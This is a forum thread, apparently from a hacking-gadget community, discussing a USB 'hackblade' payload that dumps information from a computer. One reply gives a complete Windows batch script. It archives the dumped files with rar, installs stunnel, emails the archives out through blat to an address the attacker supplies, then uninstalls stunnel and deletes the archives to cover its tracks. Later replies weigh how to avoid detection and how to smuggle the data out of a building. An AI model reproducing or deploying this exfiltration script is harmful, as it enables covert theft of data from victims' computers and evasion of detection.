Jump to content

hackblade.rar


setzer1411

Recommended Posts

  • 3 weeks later...
What, exactly, is so special about this particular payload?

It makes a logfile of the computer (same as switchblade) and emails it to you. It wouldn't be hard to write a similar thing up. I actually tried it once, but I couldn't get it to work.

Link to comment
Share on other sites

I did it once, but later I realized that I'll have the dumped files twice.

Edit:

1. Copy all files from the sbs folder (except for example sbs.exe) to the dump folder

2. Create a new send.bat file (like from the hacksaw) and use this code:

@echo on
:start
SET emailto=
SET emailfrom=
SET password=
SET subject=dump.%date%.%computername%

rar.exe a dump.%date%.%computername%.rar -v1024k -vn .%date%.%computername%"

stunnel-4.11.exe -install -quiet 2>nul
net start stunnel 2>nul
GOTO sendfiles

:sendfiles
for %%i in (dump.*.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subject% -server 127.0.0.1:1099
GOTO cleanup

:cleanup
net stop stunnel 2>nul 2>nul
stunnel-4.11.exe -uninstall -quiet 2>nul 2>nul
del /q /f dump.*.r*
GOTO end
:end

Link to comment
Share on other sites

What, exactly, is so special about this particular payload?

It makes a logfile of the computer (same as switchblade) and emails it to you. It wouldn't be hard to write a similar thing up. I actually tried it once, but I couldn't get it to work.

Wouldn't this be less effective? If it were to infect the computer quicker than dumping it would only be slightly quicker and I know using rar uses up a lot more system resources than dumping so it would be detected easier.

Link to comment
Share on other sites

But if you'll have to smuggle the dumped informations out of a $building, it wouldn't be bad having a copy on a mailserver.

If you have to do that then you obviously would need something that covers its tracks a lot better.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...